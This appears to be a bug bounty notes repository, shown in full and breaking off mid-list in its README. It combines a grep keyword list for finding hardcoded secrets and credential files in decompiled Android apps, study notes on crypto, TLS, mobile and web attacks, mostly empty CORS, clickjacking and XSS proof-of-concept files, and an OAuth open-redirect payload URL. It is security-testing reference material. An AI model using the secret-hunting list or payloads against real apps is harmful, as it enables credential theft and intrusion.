├── Android_Static_code_review ├── Basics.md ├── CORS-POC ├── 1.html ├── 2.html ├── 3.html └── Exploit-with-xss.md ├── Clickjacking.html ├── Clickjacking2.html ├── DOM_XSS_eventlistner ├── Oauth.md ├── README.md ├── XSS_payloads.md ├── XSSpotter.py ├── amsi.md ├── json_CSRF.html └── test.js /Android_Static_code_review: -------------------------------------------------------------------------------- 1 | apkx 2 | dex2jar-d2j 3 | export source code 4 | 5 | 6 | grep -ir password 7 | grep -ir sql 8 | grep -ir passwd 9 | grep -ir pwd 10 | grep -ir 'http://' 11 | grep -ir 'https://' 12 | grep -ir 'api_key' 13 | grep -ir 'api-key' 14 | grep -ir apikey 15 | grep -ir username 16 | grep -Eori 'https?://[^[:space:]]+' 17 | 18 | 19 | Save the below in a file and run *grep -ir -f a.txt* 20 | 21 | 22 | credentials 23 | firebase 24 | database 25 | constants 26 | global 27 | token 28 | secure 29 | prod 30 | 31 | .mlab.com password 32 | access_key 33 | access_token 34 | amazonaws 35 | api.googlemaps AIza 36 | api_key 37 | api_secret 38 | apidocs 39 | apikey 40 | apiSecret 41 | app_key 42 | app_secret 43 | appkey 44 | appkeysecret 45 | application_key 46 | appsecret 47 | appspot 48 | auth_token 49 | authorizationToken 50 | aws_access 51 | aws_access_key_id 52 | aws_key 53 | aws_secret 54 | aws_token 55 | AWSSecretKey 56 | bashrc password 57 | bucket_password 58 | client_secret 59 | cloudfront 60 | codecov_token 61 | conn.login 62 | connectionstring 63 | consumer_key 64 | database_password 65 | db_password 66 | db_username 67 | dbpasswd 68 | dbpassword 69 | dbuser 70 | dot-files 71 | dotfiles 72 | encryption_key 73 | fabricApiSecret 74 | fb_secret 75 | ftp 76 | gh_token 77 | github_key 78 | github_token 79 | gitlab 80 | gmail_password 81 | gmail_username 82 | herokuapp 83 | irc_pass 84 | JEKYLL_GITHUB_TOKEN 85 | keyPassword 86 | ldap_password 87 | ldap_username 88 | mailchimp 89 | mailgun 90 | master_key 91 | mydotfiles 92 | mysql 93 | node_env 94 | npmrc _auth 95 | oauth_token 96 | 
passwd 97 | password 98 | passwords 99 | pem private 100 | preprod 101 | private_key 102 | pwd 103 | pwds 104 | rds.amazonaws.com password 105 | redis_password 106 | root_password 107 | secret 108 | secret.password 109 | secret_access_key 110 | secret_key 111 | secret_token 112 | secrets 113 | security_credentials 114 | send.keys 115 | send_keys 116 | sendkeys 117 | SF_USERNAME salesforce 118 | sf_username 119 | FIREBASE_API_JSON= 120 | slack_api 121 | slack_token 122 | sql_password 123 | ssh 124 | ssh2_auth_password 125 | sshpass 126 | staging 127 | storePassword 128 | stripe 129 | swagger 130 | testuser 131 | x-api-key 132 | xoxb 133 | xoxp 134 | [WFClient] Password= 135 | access_key 136 | bucket_password 137 | dbpassword 138 | dbuser 139 | .bash_history 140 | .bash_history DOMAIN-NAME 141 | .bash_profile aws 142 | .bashrc mailchimp 143 | .bashrc password 144 | .cshrc 145 | .dockercfg auth 146 | .env DB_USERNAME NOT homestead 147 | .env MAIL_HOST=smtp.gmail.com 148 | .esmtprc password 149 | .ftpconfig 150 | .git-credentials 151 | .history 152 | .htpasswd 153 | .netrc password 154 | .npmrc _auth 155 | .pgpass 156 | .remote-sync.json 157 | .s3cfg 158 | .sh_history 159 | .tugboat NOT _tugboat 160 | _netrc password 161 | apikey 162 | bash 163 | bash_history 164 | bash_profile 165 | bashrc 166 | beanstalkd.yml 167 | CCCam.cfg 168 | composer.json 169 | config irc_pass 170 | config.json auths 171 | config.php dbpasswd 172 | configuration.php JConfig password 173 | connections 174 | connections.xml 175 | credentials aws_access_key_id 176 | cshrc 177 | dbeaver-data-sources.xml 178 | deployment-config.json 179 | dhcpd.conf 180 | dockercfg 181 | environment 182 | express.conf 183 | express.conf path:.openshift 184 | filezilla.xml 185 | filezilla.xml 186 | git-credentials 187 | gitconfig 188 | htpasswd 189 | hub oauth_token 190 | id_dsa 191 | id_rsa 192 | id_rsa or filename:id_dsa 193 | idea14.key 194 | known_hosts 195 | logins.json 196 | makefile 197 | master.key 198 | 
netrc 199 | npmrc 200 | pgpass 201 | proftpdpasswd 202 | robomongo.json 203 | s3cfg 204 | SECRET_KEY 205 | sftp-config.json 206 | sftp-config.json 207 | sftp.json 208 | sshd_config 209 | tugboat 210 | ventrilo_srv.ini 211 | WebServers.xml 212 | wp-config 213 | wp-config.php 214 | zhrc 215 | HEROKU_API_KEY 216 | HEROKU_API_KEY 217 | HOMEBREW_GITHUB_API_TOKEN 218 | msg nickserv identify 219 | AWS_ACCESS_KEY_ID 220 | list_aws_accounts 221 | aws_access_key 222 | aws_secret_key 223 | bucket_name 224 | S3_ACCESS_KEY_ID 225 | S3_BUCKET 226 | S3_ENDPOINT 227 | S3_SECRET_ACCESS_KEY 228 | databases password 229 | PT_TOKEN 230 | redis_password 231 | root_password 232 | secret_access_key 233 | SECRET_KEY_BASE= 234 | shodan_api_key 235 | WORDPRESS_DB_PASSWORD= 236 | AWS_SECRET_ACCESS_KEY 237 | API KEY 238 | API SECRET 239 | API TOKEN 240 | ROOT PASSWORD 241 | ADMIN PASSWORD 242 | GCP SECRET 243 | AWS SECRET 244 | -------------------------------------------------------------------------------- /Basics.md: -------------------------------------------------------------------------------- 1 | ----------------- 2 | Crypto 3 | 4 | bit - 0 or 1 5 | 1 byte - 8 bits 6 | 7 | Stream cipher - symmetric - takes one bit/byte at a time and XORs it with the keystream 8 | Block cipher - symmetric - takes one block (64-bit, 128-bit etc.) at a time - Blowfish, AES, DES 9 | 10 | Confusion - make the relation between the key and the ciphertext as complex as possible: if we change 1 bit of the key then almost all bits of the ciphertext should change. 11 | Diffusion - make the relation between the plaintext and the ciphertext as complex as possible: if we change 1 bit of plaintext then half or more of the ciphertext bits should also change (avalanche effect). 12 | 13 | 14 | Symmetric - AES 256 - 15 | Asymmetric - RSA - 16 | 17 | Since RSA cannot encrypt long messages, we encrypt the data with AES and encrypt the AES key with RSA to share it securely with someone (hybrid encryption). 
18 | 19 | ------------------- 20 | 21 | SSL Handshake - 22 | 23 | Client Hello 24 | Server Hello with Certificate which contains the Public Key 25 | Client verifies the certificate against the CA (expiration, validity etc.) and checks the ciphers both sides support 26 | Client generates a key, encrypts it using the server's public key and sends it to the server (the key is for symmetric encryption) (this also proves the server is who it claims to be, since only the holder of the private key can decrypt it) 27 | Server decrypts the key using asymmetric encryption (private key) and establishes a secure encrypted communication. 28 | 29 | 30 | Mutual TLS 31 | 32 | Client Hello. 33 | Server Hello with Certificate (public key) to the client. 34 | Client then confirms with the CAs whether it’s a valid certificate issued by them or not. This step makes sure the server is who it’s claiming to be. 35 | Client shares its cert and then the server verifies whether the client is allowed/whitelisted and present in the trust store or not. 36 | And then both use an agreed-upon secret in symmetric encryption. 37 | 38 | -------------------- 39 | 40 | 41 | PII data is stored how? - Encryption - Symmetric or Asymmetric depending on the need. 42 | Password hashing how? - best practice hash - Argon2 or bcrypt with SALT 43 | To verify file signatures and certificates, SHA-256 44 | Hashing rounds - taking a hash -> changing 1 bit and rehashing it. 45 | 46 | 47 | ------------- 48 | Devsecops 49 | 50 | STRIDE - Security threat model framework used to identify potential threats to applications. Each letter in the STRIDE acronym represents a different type of threat: 51 | 52 | Spoofing 53 | Tampering 54 | Repudiation 55 | Information Disclosure 56 | Denial of Service (DoS) 57 | Elevation of Privilege 58 | 59 | 60 | THREAT MODELING - Structured process of identifying, assessing, and mitigating security risks in software applications by analyzing the application's architecture, design and data flows (entry points, trust boundaries, assets) to find where threats apply. 
61 | 62 | Continuous Integration/CD -> Dependency Check SCA (Checkmarx) - SAST (Checkmarx) - pull DOCKER image and SCAN -> PUSH CODE into docker -> OS Hardening (scanning the final docker image in which the application is running) 63 | 64 | SHIFT LEFT Approach - implementing security as early in the SDLC as possible. 65 | 66 | How is the encryption key stored after encrypting? In a vault 67 | hashicorp vault 68 | 69 | ---------- 70 | 71 | 72 | MOBILE 73 | 74 | Certificate Pinning Bypass - 2 methods: by making changes in the source code OR using the Android SSL-Trust-Killer application or similar modules in Xposed 75 | 76 | Approach - shared prefs, folder permissions, MODE_WORLD_READABLE / writable files and folders, allowBackup should be false, debuggable should be false, READ_LOGS flag, static analysis, dex2jar, jd-gui, hardcoded secrets, AWS URLs, internal IPs, drozer, 77 | 78 | LOGS - 79 | Copy/Paste - another malicious application can access the clipboard and steal data 80 | 81 | Exported Content Provider - could contain keys, creds, secrets 82 | Exported Activities and Permissions - open a post-auth activity directly (drozer) 83 | Attacking Services - any exported service (e.g. location) can be started without any auth by a malicious application (drozer) (this would enable location on the Android device) 84 | 85 | 86 | Code obfuscation with the help of ProGuard to hinder jd-gui - doesn't stop RE completely but slows it down 87 | 88 | How a JWT (or any other auth token) should be stored in Android - 89 | - encrypt using a 3rd-party lib or EncryptedSharedPreferences and store in shared prefs 90 | - Store tokens in memory while the app runs, for short-term sessions. 
91 | - In the Android Keystore 92 | - Biometric authentication as 2FA for the Android Keystore 93 | 94 | 95 | Root detection - RootBeer 96 | SSL pinning bypass - Xposed, Frida 97 | MobSF 98 | 99 | 100 | webview - loads a webpage within the application 101 | deeplink - customscheme://call/profiledelete 102 | 103 | CSRF - deleteprofile deeplink: any 3rd-party application can call the deeplink and delete the profile - (autoVerify = true) should be set in the AndroidManifest to remediate this. 104 | openredirect - find a deeplink with an intent-filter and scheme, and execute 105 | 106 | Intent can be used for 107 | 108 | To start an Activity, typically opening a user interface for an app 109 | As broadcasts to inform the system and apps of changes 110 | To start, stop, and communicate with a background service 111 | 112 | 113 | 114 | 115 | ---------- 116 | Web 117 | 118 | 119 | HTTP Desync 120 | Deserialization 121 | 122 | DOM - 123 | sources: 124 | document.URL 125 | document.documentURI 126 | document.URLUnencoded 127 | document.baseURI 128 | location.search 129 | document.cookie 130 | document.referrer 131 | 132 | sinks: 133 | eval 134 | element.innerHTML 135 | element.outerHTML 136 | element.insertAdjacentHTML 137 | element.onevent 138 | document.write() 139 | document.writeln() 140 | document.domain 141 | 142 | 143 | 144 | * Oauth flows - 145 | Authorization Code Flow - the authorization code is received and then back-end server-to-server communication exchanges it for the access token and user details 146 | Implicit Grant Type - Used for single page applications since there is no backend. 
they directly receive the access token through an interceptable request and then send a POST request to save it in the database if needed in future for user login 147 | 148 | State parameter 149 | redirect_uri + open redirect chain 150 | 151 | 152 | OPENID - layer on top of OAuth for authentication 153 | - scope openid - must 154 | - id_token - JWT received with the access token as the identity identifier of the user 155 | 156 | attack - self client registration with redirect_uri, logo_uri, which gets fetched by the server, causing an SSRF 157 | 158 | 159 | 160 | 161 | ------ 162 | Network 163 | 164 | OSI - Common Attacks 165 | 166 | 167 | Physical - Cables, wire, Bluetooth, USB, LAN - DoS attacks, MITM physical device 168 | DataLink - ARP, WAN - ARP Spoofing, MAC Flooding 169 | Network - ICMP, IPv4, IPv6, IPsec - IP Spoofing 170 | Transport - TCP/UDP - DDoS - SYN Flood 171 | Session - NetBIOS - Session Hijacking 172 | Presentation - SSL - SSL Hijacking MITM 173 | Application Layer - ALL the web related attacks - SQLi, XSS, parameter tampering 174 | 175 | All people should try new dominos pizza (mnemonic for the layers, top-down) 176 | 177 | 178 | eavesdropping 179 | DNS poisoning - 180 | ARP spoofing - MAC:IP 181 | ----------- 182 | 183 | Hardik - 184 | 185 | Buffer overflow basic 186 | 187 | Application takes a username input of 8 chars; if we give more chars the application should return an error and not process the input. A buffer overflow occurs when, e.g., we give 10 chars and the application still processes the extra chars, which overwrite adjacent memory; the attacker could then get their own code run (malicious shell script, reverse shell etc.). 188 | 189 | 190 | Network 191 | 192 | How does Nmap work? 193 | Ping work? 194 | 195 | --------- 196 | Config Review. 
CIS Benchmark / Trend Micro 197 | Azure Benchmark foundation 198 | GCP Benchmark 199 | AWS Benchmark 200 | 201 | Palo Alto 202 | 203 | Components/services - IAM, Lambda, EKS, 204 | ------ 205 | 206 | 207 | OWASP cheatsheet - 208 | 209 | Database 210 | Crypto 211 | TLS 212 | CSRF 213 | DOM BASED XSS 214 | Mobile Application 215 | Cloud Architecture Security 216 | Architecture review 217 | Secret Management 218 | 219 | 220 | 221 | 222 | **Firewalls** control and filter network traffic to protect against unauthorized access and cyber threats. They control what goes out of the internal network and what requests come in. 223 | 224 | **Intrusion Detection Systems (IDS)** monitor network traffic for signs of potential attacks and generate alerts. 225 | 226 | **Intrusion Prevention Systems (IPS)** go a step further by not only detecting threats but actively blocking or mitigating them to protect your network in real time. 227 | 228 | 229 | 230 | 231 | 232 | ------ 233 | 234 | 235 | **Secure Shell (SSH)** - A network protocol that provides secure access to remote systems and encrypted data communication. 236 | 237 | **Secure Sockets Layer (SSL)** - A security protocol that ensures encrypted and secure communication over the internet, commonly used between a web browser and a web server. 238 | 239 | **Transport Layer Security (TLS)** - A cryptographic protocol that ensures secure communication over the internet. It is an updated and more secure version of SSL (Secure Sockets Layer) and is commonly used to encrypt data transmitted between a client (e.g., web browser) and a server, providing confidentiality and integrity of the information exchanged. 240 | 241 | **Internet Protocol Security (IPsec)** - set of protocols used to secure Internet Protocol (IP) communications (IPs, routers, servers, http-https, ftp, ssh, packets etc.). It provides authentication, encryption, and data integrity for data transmitted over IP networks, ensuring the confidentiality and security of network traffic. 
IPsec is often used to establish virtual private networks (VPNs) and secure communication between networked devices. 242 | 243 | IP communications enable devices worldwide to exchange data over the internet. It's the language that devices use to talk to each other, and it forms the backbone of our digital connectivity. 244 | 245 | **Domain Name System Security Extensions (DNSSEC)** - Set of protocols and security measures designed to enhance the security of the DNS. DNS is responsible for translating human-friendly domain names (like www.example.com) into IP addresses that computers and servers use to locate each other on the internet. 246 | 247 | DNSSEC adds a layer of security to this translation process by digitally signing (asymmetric cryptograpy) DNS data. 248 | 249 | 250 | 251 | 252 | --------- 253 | 254 | 255 | 256 | ### Applied cryptography: 257 | 258 | **Symmetric encryption** - One Key Shared with All - AES 259 | 260 | **Asymmetric encryption** - Public And Private Key - RSA 261 | 262 | **Hashing** - Integrity of data (Password should be hashed with random salt) 263 | 264 | 265 | 266 | # Hashing vs. Encryption vs. Encoding 267 | 268 | ## Hashing 269 | 270 | - **Purpose:** Hashing is primarily used to transform data into a fixed-size string of characters, known as a hash value or digest. It is commonly used for data integrity verification and data retrieval. 271 | 272 | - **Operation:** It is a one-way process, meaning it cannot be reversed to obtain the original data. 273 | 274 | - **Security:** Hashing is not designed for data security or confidentiality; its primary purpose is data integrity verification. 275 | 276 | - **Use Cases:** Hashing is used in password storage (with salting), digital signatures, verifying file integrity, and in data structures like hash tables for efficient data retrieval. 
277 | 278 | ## Encryption 279 | 280 | - **Purpose:** Encryption is used to protect data confidentiality by converting plain text (original data) into a ciphertext (encrypted data) that can only be read by authorized parties with the decryption key. 281 | 282 | - **Operation:** Two way (reversible) - with a shared symmetric key, or a public/private key pair. 283 | 284 | - **Security:** Encryption is focused on protecting data from unauthorized access. It ensures that even if someone gains access to the encrypted data, they cannot decipher it without the decryption key. 285 | 286 | - **Use Cases:** Encryption is widely used in securing communications (e.g., SSL/TLS for secure web browsing), protecting sensitive data at rest (e.g., full-disk encryption), and ensuring data privacy. 287 | 288 | ## Encoding 289 | 290 | - **Purpose:** Encoding is used to represent data in a specific format for data transmission. It doesn't provide confidentiality or integrity the way encryption or hashing do. 291 | 292 | - **Operation:** Encoding translates data from one format to another, typically using a well-defined scheme. It's a reversible process, meaning the original data can be obtained by decoding it. 293 | 294 | - **Security:** Encoding is not a security measure. It's used to ensure that data is in a format that can be correctly processed by various systems and protocols. 295 | 296 | - **Use Cases:** Encoding is used in various scenarios, such as URL encoding for web addresses, Base64 encoding for binary-to-text conversion, and character encoding (e.g., UTF-8) for international character representation. 297 | 298 | 299 | 300 | 301 | 302 | # Digital Signatures vs. 
Hashing 303 | 304 | Digital signatures and hashing are both cryptographic techniques used to ensure the integrity and authenticity of data, but they serve different purposes and have distinct characteristics: 305 | 306 | ## Purpose 307 | 308 | - **Digital Signatures:** Digital signatures are primarily used to verify the authenticity of a document or message and ensure that it has not been tampered with during transmission. They provide a means to prove the identity of the sender and guarantee that the sender has endorsed the content. 309 | 310 | - **Hashing:** Hashing is used to create a fixed-length string of characters (the hash value or digest) from any input data, regardless of its size. Hashing is primarily used for data integrity verification. It ensures that data has not changed by comparing the hash of the original data with the hash of the received data. 311 | 312 | ## Operation 313 | 314 | - **Digital Signatures:** Digital signatures involve the use of asymmetric cryptography. A private key is used to create the signature, and a corresponding public key is used to verify it. 315 | 316 | - **Hashing:** Hashing uses a one-way hash function to transform data into a fixed-size string of characters. It is a one-way process, meaning it cannot be reversed to obtain the original data. 317 | 318 | ## Verification 319 | 320 | - **Digital Signatures:** Verification of a digital signature requires the sender's public key and the signature itself. The recipient can confirm the authenticity of the message and the sender's identity. 321 | 322 | - **Hashing:** Hash verification only requires the hash value of the original data and the recalculated hash of the received data. If the two hash values match, the data is considered intact. 323 | 324 | ## Use Cases 325 | 326 | - **Digital Signatures:** Used in scenarios where both data integrity and sender authentication are important, such as secure email communication, digital contracts, and software updates. 
327 | 328 | - **Hashing:** Used for data integrity checks, password storage (by hashing and salting), and in various data structures like hash tables for efficient data retrieval. 329 | 330 | In summary, digital signatures are more focused on data integrity and sender authentication, while hashing is primarily used for data integrity verification. These techniques are often used in combination to ensure the security of digital communications and data storage. 331 | -------------------------------------------------------------------------------- /CORS-POC/1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |

5 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /CORS-POC/2.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | -------------------------------------------------------------------------------- /CORS-POC/3.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 17 | 18 | 19 |
20 |

CORS PoC Exploit

21 |
22 | 23 |
24 | 25 | 26 | -------------------------------------------------------------------------------- /CORS-POC/Exploit-with-xss.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 17 | ``` 18 | 19 | https://example.com/search?tmp=ABOVE PAYLAOD 20 | -------------------------------------------------------------------------------- /Clickjacking.html: -------------------------------------------------------------------------------- 1 | 16 |
click
17 | // make div a button for more flexible attack 18 | 19 | -------------------------------------------------------------------------------- /Clickjacking2.html: -------------------------------------------------------------------------------- 1 | 16 |
click
17 | 18 | -------------------------------------------------------------------------------- /DOM_XSS_eventlistner: -------------------------------------------------------------------------------- 1 | window.addEventListener('message', function(e) { 2 | document.getElementById('ads').innerHTML = e.data; 3 | }) 4 | 5 | Attacker.html 6 | 12 | -------------------------------------------------------------------------------- /Oauth.md: -------------------------------------------------------------------------------- 1 | If there is Oauth See for Open_Redirection 2 | 3 | ``` 4 | Url encoding is important, also change the client_id as per the application. 5 | 6 | https://www.target.com/oauth/authorize?response_type=token&redirect_uri=http%3A%2F%2Fgoogle.com%3A80%2F&scope=profile&client_id=ADDTHECLIENTIDHERE 7 | ``` 8 | This url will redirect to google.com 9 | 10 | attacker can redirect to any website. 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bug Bounty Reference 2 | 3 | A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty 4 | 5 | Here You can find the writeups of all the bugs that was awesome. 
6 | 7 | - [XSSI](#xssi) 8 | - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) 9 | - [Brute Force](#brute-force) 10 | - [SQL Injection (SQLi)](#sql-injection) 11 | - [External XML Entity Attack (XXE)](#xxe) 12 | - [Remote Code Execution (RCE)](#remote-code-execution) 13 | - [Deserialization](#deserialization) 14 | - [Image Tragick](#image-tragick) 15 | - [Cross-Site Request Forgery (CSRF)](#csrf) 16 | - [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor) 17 | - [Stealing Access Token](#stealing-access-token) 18 | - [Google Oauth Login Bypass](#google-oauth-bypass) 19 | - [Server Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf) 20 | - [Unrestricted File Upload](#unrestricted-file-upload) 21 | - [Race Condition](#race-condition) 22 | - [Business Logic Flaw](#business-logic-flaw) 23 | - [Authentication Bypass](#authentication-bypass) 24 | - [HTTP Header Injection](#http-header-injection) 25 | - [Email Related](#email-related) 26 | - [Money Stealing](#money-stealing) 27 | - [Miscellaneous](#miscellaneous) 28 | 29 | ### Cross-Site Scripting (XSS) 30 | 31 | - [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach 32 | - [RPO that lead to information leakage in Google](http://blog.innerht.ml/rpo-gadgets/) by filedescriptor 33 | - [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton 34 | - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager 35 | - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen 36 | - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton 37 | - he is able to make stored XSS from a 
irrelevant domain to main facebook domain 38 | - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton 39 | - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes 40 | - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek 41 | - [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S 42 | - [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO 43 | - [Stored XSS in Google Docs (Bug Bounty)](http://hmgmakarovich.blogspot.hk/2015/11/stored-xss-in-google-docs-bug-bounty.html) by Harry M Gertos 44 | - [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) 45 | - [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy 46 | - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa 47 | - [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen 48 | - [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz 49 | - [IE & Edge URL parsin Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify 50 | - [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) 51 | - [Microsoft XSS and Twitter XSS](http://blog.wesecureapp.com/xss-by-tossing-cookies/) 52 | - [Google Japan Book 
XSS](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/) 53 | - [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans 54 | - [Flash XSS in multiple libraries](https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/) - by Olivier Beg 55 | - [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) 56 | - [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) 57 | - [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) 58 | - [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) 59 | - [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy 60 | - [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard 61 | - [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard 62 | - [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) 63 | - [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy 64 | - [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) 65 | - [How I found a $5,000 Google Maps XSS (by fiddling with 
Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow 66 | - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett 67 | - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) 68 | - [postMessage XSS Bypass](https://hackerone.com/reports/231053) 69 | - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin 70 | - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans 71 | - [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) 72 | - [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen 73 | - [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) 74 | - [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov 75 | - [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) 76 | - [Managed Apps and Music: two Google reflected XSSes](https://ysx.me.uk/managed-apps-and-music-a-tale-of-two-xsses-in-google-play/) 77 | - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) 78 | - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) 79 | - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) 80 | - [Stored XSS on 
Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) 81 | 82 | ### Brute Force 83 | - [Web Authentication Endpoint Credentials Brute-Force Vulnerability](https://hackerone.com/reports/127844) by Arne Swinnen 84 | - [InstaBrute: Two Ways to Brute-force Instagram Account Credentials](https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-instagram-account-credentials/) by Arne Swinnen 85 | - [How I Could Compromise 4% (Locked) Instagram Accounts](https://www.arneswinnen.net/2016/03/how-i-could-compromise-4-locked-instagram-accounts/) by Arne Swinnen 86 | - [Possibility to brute force invite codes in riders.uber.com](https://hackerone.com/reports/125505) by r0t 87 | - [Brute-Forcing invite codes in partners.uber.com](https://hackerone.com/reports/144616) by Efkan Gökbaş (mefkan) 88 | - [How I could have hacked all Facebook accounts](http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html) by Anand Prakash 89 | - [Facebook Account Take Over by using SMS verification code, not accessible by now, may get update from author later](http://arunsureshkumar.me/index.php/2016/04/24/facebook-account-take-over/) by Arun Sureshkumar 90 | 91 | ### SQL Injection 92 | - [SQL injection in Wordpress Plugin Huge IT Video Gallery in Uber](https://hackerone.com/reports/125932) by glc 93 | - [SQL Injection on sctrack.email.uber.com.cn](https://hackerone.com/reports/150156) by Orange Tsai 94 | - [Yahoo – Root Access SQL Injection – tw.yahoo.com](http://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/) by Brett Buerhaus 95 | - [Multiple vulnerabilities in a WordPress plugin at drive.uber.com](https://hackerone.com/reports/135288) by Abood Nour (syndr0me) 96 | - [GitHub Enterprise SQL Injection](http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html) by Orange 97 | - [Yahoo SQL Injection to Remote Code Exection to Root Privilege](http://www.sec-down.com/wordpress/?p=494) by Ebrahim Hegazy 98 
